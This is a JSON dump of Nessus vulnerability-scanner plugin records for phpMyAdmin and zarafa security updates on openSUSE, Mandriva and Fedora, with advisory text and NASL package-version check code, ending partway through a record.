{"nessus": [{"lastseen": "2021-08-19T12:48:50", "description": "This phpMyAdmin update addresses several security and non security issues :\n\n - This is a phpMyAdmin version upgrade (bnc#892401): (From 4.1.14.3) :\n\n - sf#4501 [security] XSS in table browse page (CVE-2014-5273)\n\n - sf#4502 [security] Self-XSS in enum value editor (CVE-2014-5273)\n\n - sf#4503 [security] Self-XSSes in monitor (CVE-2014-5273)\n\n - sf#4505 [security] XSS in view operations page (CVE-2014-5274)\n\n - sf#4504 [security] Self-XSS in query charts	(CVE-2014-5273)\n\n - sf#4517 [security] XSS in relation view (CVE-2014-5273) (From 4.1.14.2) :\n\n - sf#4488 [security] XSS injection due to unescaped table name (triggers)(CVE-2014-4955)\n\n - sf#4492 [security] XSS in AJAX confirmation messages (CVE-2014-4986)\n\n - sf#4491 [security] Missing validation for accessing User groups feature (CVE-2014-4987) (From 4.1.14.1) :\n\n - sf#4464 [security] XSS injection due to unescaped db/table name in navigation hiding (CVE-2014-4349) (From 4.1.14.0 through 4.1.9.0) :\n\n - Numerous non-security bugfixes are listed at https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_ 14/ChangeLog", "cvss3": {"score": null, "vector": null}, "published": "2014-08-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1069-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987", "CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpMyAdmin", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-518.NASL", "href": "https://www.tenable.com/plugins/nessus/77432", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-518.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77432);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-4349\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\", \"CVE-2014-5273\", \"CVE-2014-5274\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1069-1)\");\n script_summary(english:\"Check for the openSUSE-2014-518 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This phpMyAdmin update addresses several security and non security\nissues :\n\n - This is a phpMyAdmin version upgrade (bnc#892401): (From\n 4.1.14.3) :\n\n - sf#4501 [security] XSS in table browse page\n (CVE-2014-5273)\n\n - sf#4502 [security] Self-XSS in enum value editor\n (CVE-2014-5273)\n\n - sf#4503 [security] Self-XSSes in monitor (CVE-2014-5273)\n\n - sf#4505 [security] XSS in view operations page\n (CVE-2014-5274)\n\n - sf#4504 [security] Self-XSS in query\n charts	(CVE-2014-5273)\n\n - sf#4517 [security] XSS in relation view (CVE-2014-5273)\n (From 4.1.14.2) :\n\n - sf#4488 [security] XSS injection due to unescaped table\n name (triggers)(CVE-2014-4955)\n\n - sf#4492 [security] XSS in AJAX confirmation messages\n (CVE-2014-4986)\n\n - sf#4491 [security] Missing validation for accessing User\n groups feature (CVE-2014-4987) (From 4.1.14.1) :\n\n - sf#4464 [security] XSS injection due to unescaped\n db/table name in navigation hiding (CVE-2014-4349) (From\n 4.1.14.0 through 4.1.9.0) :\n\n - Numerous non-security bugfixes are listed at\n https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_\n 14/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_14/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-08/msg00045.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"phpMyAdmin-4.1.14.3-1.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"phpMyAdmin-4.1.14.3-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:48:33", "description": "Updated zarafa packages fix security vulnerabilities :\n\nRobert Scheck reported that Zarafa's WebAccess stored session information, including login credentials, on-disk in PHP session files. This session file would contain a user's username and password to the Zarafa IMAP server (CVE-2014-0103).\n\nRobert Scheck discovered that the Zarafa Collaboration Platform has multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448, CVE-2014-5449, CVE-2014-5450).", "cvss3": {"score": null, "vector": null}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : zarafa (MDVSA-2014:182)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0103", "CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449", "CVE-2014-5450"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64zarafa-devel", "p-cpe:/a:mandriva:linux:lib64zarafa0", "p-cpe:/a:mandriva:linux:php-mapi", "p-cpe:/a:mandriva:linux:python-MAPI", "p-cpe:/a:mandriva:linux:zarafa", "p-cpe:/a:mandriva:linux:zarafa-archiver", "p-cpe:/a:mandriva:linux:zarafa-caldav", "p-cpe:/a:mandriva:linux:zarafa-client", "p-cpe:/a:mandriva:linux:zarafa-common", "p-cpe:/a:mandriva:linux:zarafa-dagent", "p-cpe:/a:mandriva:linux:zarafa-gateway", "p-cpe:/a:mandriva:linux:zarafa-ical", "p-cpe:/a:mandriva:linux:zarafa-indexer", "p-cpe:/a:mandriva:linux:zarafa-monitor", "p-cpe:/a:mandriva:linux:zarafa-server", "p-cpe:/a:mandriva:linux:zarafa-spooler", "p-cpe:/a:mandriva:linux:zarafa-utils", "p-cpe:/a:mandriva:linux:zarafa-webaccess", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-182.NASL", "href": "https://www.tenable.com/plugins/nessus/77839", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:182. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77839);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0103\", \"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(68247, 69362, 69365, 69369, 69370);\n script_xref(name:\"MDVSA\", value:\"2014:182\");\n\n script_name(english:\"Mandriva Linux Security Advisory : zarafa (MDVSA-2014:182)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated zarafa packages fix security vulnerabilities :\n\nRobert Scheck reported that Zarafa's WebAccess stored session\ninformation, including login credentials, on-disk in PHP session\nfiles. This session file would contain a user's username and password\nto the Zarafa IMAP server (CVE-2014-0103).\n\nRobert Scheck discovered that the Zarafa Collaboration Platform has\nmultiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448,\nCVE-2014-5449, CVE-2014-5450).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0380.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zarafa-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zarafa0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-MAPI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-archiver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-caldav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-dagent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-gateway\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-ical\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-indexer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-spooler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-webaccess\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64zarafa-devel-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64zarafa0-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"php-mapi-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-MAPI-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-archiver-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-caldav-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-client-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-common-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-dagent-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-gateway-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-ical-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-indexer-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-monitor-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-server-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-spooler-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-utils-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"zarafa-webaccess-7.1.8-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:48:58", "description": "Fixed multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.5, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-09-03T00:00:00", "type": "nessus", "title": "Fedora 19 : zarafa-7.1.10-4.fc19 (2014-9768)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449", "CVE-2014-5450"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zarafa", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-9768.NASL", "href": "https://www.tenable.com/plugins/nessus/77484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9768.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77484);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(69362, 69365, 69369, 69370);\n script_xref(name:\"FEDORA\", value:\"2014-9768\");\n\n script_name(english:\"Fedora 19 : zarafa-7.1.10-4.fc19 (2014-9768)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixed multiple incorrect default permissions (CVE-2014-5447,\nCVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1133439\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137232.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8953ecaf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zarafa package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"zarafa-7.1.10-4.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zarafa\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:48:57", "description": "Fixed multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.5, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-08-30T00:00:00", "type": "nessus", "title": "Fedora 20 : zarafa-7.1.10-4.fc20 (2014-9754)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449", "CVE-2014-5450"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zarafa", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9754.NASL", "href": "https://www.tenable.com/plugins/nessus/77450", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9754.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77450);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(69362, 69365, 69369, 69370);\n script_xref(name:\"FEDORA\", value:\"2014-9754\");\n\n script_name(english:\"Fedora 20 : zarafa-7.1.10-4.fc20 (2014-9754)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixed multiple incorrect default permissions (CVE-2014-5447,\nCVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1133439\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137158.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb328207\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zarafa package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"zarafa-7.1.10-4.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zarafa\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:08:12", "description": "According to its self-reported version number, the phpMyAdmin install hosted on the remote web server is 4.0.x prior to 4.0.10.1, 4.1.x prior to 4.1.14.2, or 4.2.x prior to 4.2.6. It is, therefore, affected by the following vulnerabilities :\n\n - The 'TABLE_COMMENT' parameter input is not being validated in the script 'libraries/structure.lib.php' and could allow cross-site scripting attacks. Note that this issue affects the 4.2.x branch. (CVE-2014-4954)\n\n - The 'trigger' parameter input is not being validated in the script 'libraries/rte/rte_list.lib.php' and could allow cross-site scripting attacks. (CVE-2014-4955)\n\n - The 'table' and 'curr_column_name' parameter inputs are not being validated in the scripts 'js/functions.js' and 'js/tbl_structure.js' respectively and could allow cross-site scripting attacks. (CVE-2014-4986)\n\n - The script 'server_user_groups.php' contains an error that could allow a remote attacker to obtain the MySQL user list and possibly make changes to the application display. Note this issue only affects the 4.1.x and 4.2.x branches. (CVE-2014-4987)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-07-30T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.1 / 4.1.x < 4.1.14.2 / 4.2.x < 4.2.6 Multiple Vulnerabilities (PMASA-2014-4 - PMASA-2014-7)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4954", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_7.NASL", "href": "https://www.tenable.com/plugins/nessus/76915", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76915);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-4954\",\n \"CVE-2014-4955\",\n \"CVE-2014-4986\",\n 